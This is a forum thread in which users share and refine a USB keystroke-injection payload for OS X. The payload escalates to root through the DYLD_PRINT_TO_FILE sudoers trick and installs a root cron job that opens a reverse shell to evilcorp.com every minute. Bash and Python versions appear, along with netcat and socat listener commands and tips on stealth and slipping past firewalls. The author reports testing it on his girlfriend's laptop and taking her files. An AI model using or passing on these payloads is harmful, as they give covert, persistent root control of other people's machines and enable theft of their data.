Matto Posted August 9, 2015 Share Posted August 9, 2015 Hi! I'm new to the Rubber Ducky and to this community. I've made a simple payload to create a reverse bash in an OS X target by using crontab. I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session. Anyway, this is my payload: DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 300 STRING Terminal DELAY 300 ENTER DELAY 700 COMMAND n DELAY 500 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 200 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab - ENTER DELAY 200 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 200 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER COMMAND Q What this does is: Open the terminal Magically grant sudo privileges (many thanks to V3sth4cks153 for this) Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP) Remove the newly added privileges to the current user in /etc/sudoers Close the terminal app The whole execution takes around 5 seconds. So now, all we have to do in our attacking machine is: sudo nc -l -p 443 We wait one minute (max) and we're in with root privileges Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it. Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want. I just tested it on my girlfriend's Macbook Air and it works flawlessly. One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this? Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect. Hope you like it! Quote Link to comment Share on other sites More sharing options...
V3sth4cks153 Posted August 10, 2015 Share Posted August 10, 2015 Hi! I'm new to the Rubber Ducky and to this community. I've made a simple payload to create a reverse bash in an OS X target by using crontab. I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session. Anyway, this is my payload: DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 300 STRING Terminal DELAY 300 ENTER DELAY 700 COMMAND n DELAY 500 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 200 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab - ENTER DELAY 200 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 200 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER COMMAND Q What this does is:Open the terminal Magically grant sudo privileges (many thanks to V3sth4cks153 for this) Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP) Remove the newly added privileges to the current user in /etc/sudoers Close the terminal app The whole execution takes around 5 seconds.So now, all we have to do in our attacking machine is: sudo nc -l -p 443 We wait one minute (max) and we're in with root privileges Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it. Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want. I just tested it on my girlfriend's Macbook Air and it works flawlessly. One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this? Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect. Hope you like it! Hi ! That looks really good ! I think that maybe the scripts you saw use plists for hiding purposes ? But even using crontab I think is covert enough for the average Mac user not to notice it. The problem you have may be caused by the encoding of your payload... I had some problems with language properties... For example, encoding a payload with the Swiss layout sometimes caused some special characters (<, >, and some other ones) to be swapped, but it never happened with the arrow keys. What keyboard layout are you using ? Quote Link to comment Share on other sites More sharing options...
Matto Posted August 10, 2015 Author Share Posted August 10, 2015 Thanks! The code I saw uses the .plist files to start the connection on reboot and repeat the execution of the script each 60 seconds, but I just find it way easier to do with crontab. Yes, this makes it difficult to find, specially because it adds the cron task to root's crontab, so even if the user takes a look at his own cron list, he will see nothing (unless he is root) :) Regarding the arrows: The problem is not with the payload (it works as intended :). The problem is with netcat once it's connected and I gain control manually (no longer using the ducky). When the victim makes the connection to my server, from my terminal I can't edit his files using VIM or nano since when I open any file, I can't use the arrows to move around (weird symbols appear instead). Same happens when I want to «borrow» a file from the victim. When I try to connect via FTP from his machine to my server, I write: ftp myserver.com And instead of asking for the username / password, the terminal goes blank and does not respond anymore, as if the connection was lost. Maybe it's a netcat limitation to send some output and special keys (as the arrows) through the connection? Do you know any way around this? I know setting an SSH server in the victim would be the best solution, but then the port 22 should be open in his router and pointing to his IP address... I'm not sure if I'm making myself clear. I'm sorry, english is not my native language :) Thanks! Quote Link to comment Share on other sites More sharing options...
V3sth4cks153 Posted August 10, 2015 Share Posted August 10, 2015 (edited) Thanks! The code I saw uses the .plist files to start the connection on reboot and repeat the execution of the script each 60 seconds, but I just find it way easier to do with crontab. Yes, this makes it difficult to find, specially because it adds the cron task to root's crontab, so even if the user takes a look at his own cron list, he will see nothing (unless he is root) :) Regarding the arrows: The problem is not with the payload (it works as intended :). The problem is with netcat once it's connected and I gain control manually (no longer using the ducky). When the victim makes the connection to my server, from my terminal I can't edit his files using VIM or nano since when I open any file, I can't use the arrows to move around (weird symbols appear instead). Same happens when I want to «borrow» a file from the victim. When I try to connect via FTP from his machine to my server, I write: ftp myserver.comAnd instead of asking for the username / password, the terminal goes blank and does not respond anymore, as if the connection was lost.Maybe it's a netcat limitation to send some output and special keys (as the arrows) through the connection? Do you know any way around this? I know setting an SSH server in the victim would be the best solution, but then the port 22 should be open in his router and pointing to his IP address... I'm not sure if I'm making myself clear. I'm sorry, english is not my native language :) Thanks! Oh ! I understand ! So it's not a question of being more discrete then...For your problem with the arrow keys, I think it might be a NetCat issue, but I really don't know how to get around it... Don't worry, you're making yourself perfectly clear. At least for me even if English is not my native language as well ! :) Edited August 10, 2015 by V3sth4cks153 Quote Link to comment Share on other sites More sharing options...
Matto Posted August 14, 2015 Author Share Posted August 14, 2015 Good news!! I've searching around and I found that «netcat does a terrible job emulating a tty», so as I stated before, arrows and key combinations don't work as expected. Then I found a way better alternative to the payload that uses python to create the reverse shell and socat instead of netcat to listen for the connection. This is the Ducky payload: DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 200 STRING Terminal DELAY 200 ENTER DELAY 500 COMMAND n DELAY 300 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 100 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l; echo "* * * * * python -c \"import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')\" evilcorp.com 443") | crontab - ENTER DELAY 100 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 100 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER DELAY 100 COMMAND w DELAY 100 COMMAND q And in your server, to listen for the connection you have to run: sudo socat `tty`,raw,echo=0 tcp-listen:443 NOTE: Mostly sure you don't have socat installed, but you can do it very easily via apt-get (if your server is Debian based Linux. I'm not sure if it's available in OS X via homebrew). This method has a longer command to execute and is not as «elegant» as the previous, but it solves ALL of the problems, and when I say all, I mean that even the autocomplete with the TAB key works perfectly. It's just the same behaviour than an SSH connection. You can also press «Ctrl + C» and you won't drop the connection, it's going to send that command to the victim as expected :) To exit, just press «Ctrl + D». Same as before, it will try to reconnect every 60 seconds. I hope this helps. I've tested it an works like a charm. Quote Link to comment Share on other sites More sharing options...
V3sth4cks153 Posted August 15, 2015 Share Posted August 15, 2015 Good news!! I've searching around and I found that «netcat does a terrible job emulating a tty», so as I stated before, arrows and key combinations don't work as expected. Then I found a way better alternative to the payload that uses python to create the reverse shell and socat instead of netcat to listen for the connection. This is the Ducky payload: DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 200 STRING Terminal DELAY 200 ENTER DELAY 500 COMMAND n DELAY 300 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 100 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l; echo "* * * * * python -c \"import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')\" evilcorp.com 443") | crontab - ENTER DELAY 100 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 100 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER DELAY 100 COMMAND w DELAY 100 COMMAND q And in your server, to listen for the connection you have to run: sudo socat `tty`,raw,echo=0 tcp-listen:443 NOTE: Mostly sure you don't have socat installed, but you can do it very easily via apt-get (if your server is Debian based Linux. I'm not sure if it's available in OS X via homebrew).This method has a longer command to execute and is not as «elegant» as the previous, but it solves ALL of the problems, and when I say all, I mean that even the autocomplete with the TAB key works perfectly. It's just the same behaviour than an SSH connection. You can also press «Ctrl + C» and you won't drop the connection, it's going to send that command to the victim as expected :) To exit, just press «Ctrl + D». Same as before, it will try to reconnect every 60 seconds. I hope this helps. I've tested it an works like a charm. That's so cool ! Really well done ! I'll test it first thing tomorrow ! Quote Link to comment Share on other sites More sharing options...
Matto Posted August 15, 2015 Author Share Posted August 15, 2015 Nice! Let me know how it went :) Quote Link to comment Share on other sites More sharing options...
V3sth4cks153 Posted August 16, 2015 Share Posted August 16, 2015 (edited) Nice! Let me know how it went :) I tried the first payload, which uses the bash reverse shell, and it worked without any problem on my mac ! I'll try it on other macs tomorrow, and let you know how this goes... However, when trying to use the second one, which uses python, I was blocked because it uses some backslashes... I tried modifying the keyboard properties, but as I just posted here: https://forums.hak5.org/index.php?/topic/36433-multiple-modifier-keys-in-keyboard-layout/, I can't get it to work... Do you know how to use more than one modifier key in the properties file ? Edited August 16, 2015 by V3sth4cks153 Quote Link to comment Share on other sites More sharing options...
Matto Posted August 17, 2015 Author Share Posted August 17, 2015 Oops, you got me there. I managed to make a proper layout for my keyboard using other languages as reference, but it was all trial and error. The backlash was one of the keys that was not working correctly, so I had to fix it. I'm not sure if it will help, but these are the changes I made: https://forums.hak5.org/index.php?/topic/36068-keyboard-layout-modified-spanish-keyboard-layout/ Quote Link to comment Share on other sites More sharing options...
Peyo Posted August 26, 2015 Share Posted August 26, 2015 This payload only works on OSX 10.10.4 and prior (DYLD_PRINT_TO_FILE vulnerability it's corrected on 10.10.5) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.